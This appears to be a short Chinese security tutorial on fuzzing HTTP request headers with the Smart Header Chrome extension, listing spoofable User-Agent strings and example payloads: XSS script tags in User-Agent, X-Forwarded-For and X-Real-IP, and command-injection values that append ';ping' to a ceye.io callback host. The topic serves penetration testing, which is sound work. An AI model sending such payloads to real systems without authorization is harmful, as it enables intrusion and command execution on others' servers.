使用 Smart Header 来边浏览边进行 HTTP Request Header fuzzing

正文

https://chrome.google.com/webstore/detail/smart-header/ncgnmldbedmbadafajhjeahmafdmggbp?hl=zh-CN

fuzzing HTTP 头可能导致的漏洞包括(但不限于) XSS, SQLi (Blind) 以及命令执行(RCE)。

值得注意的一些HTTP请求头

1
2
3
4
User-Agent
Accept-Language
X-Forwarded-Forwarded-For
X-Real-IP

常用配置项

User-Agent

UA

1
2
3
4
5
6
7
8
9
10
11
12
# PC 百度蜘蛛
Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
# Mobile 百度蜘蛛
Mozilla/5.0 (Linux;u;Android 4.2.2;zh-cn;) AppleWebKit/534.46 (KHTML,like Gecko) Version/5.1 Mobile Safari/10600.6.3 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
# Google
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
# IE 6
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.6.01001)
# iPhone6
Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1
# Samsung Galaxy S4
Mozilla/5.0 (Linux; Android 4.2.2; GT-I9505 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.59 Mobile Safari/537.36

举个例子

1
2
3
4
5
User-Agent: <script>alert(1)</script>
X-Forwarded-For: <script>alert(1)</script>
X-Real-IP: <script>alert(1)</script>
X-Forwarded-For: 8.8.8.8;ping xff.test.ceye.io
X-Real-IP: 8.8.8.8;ping xff.test.ceye.io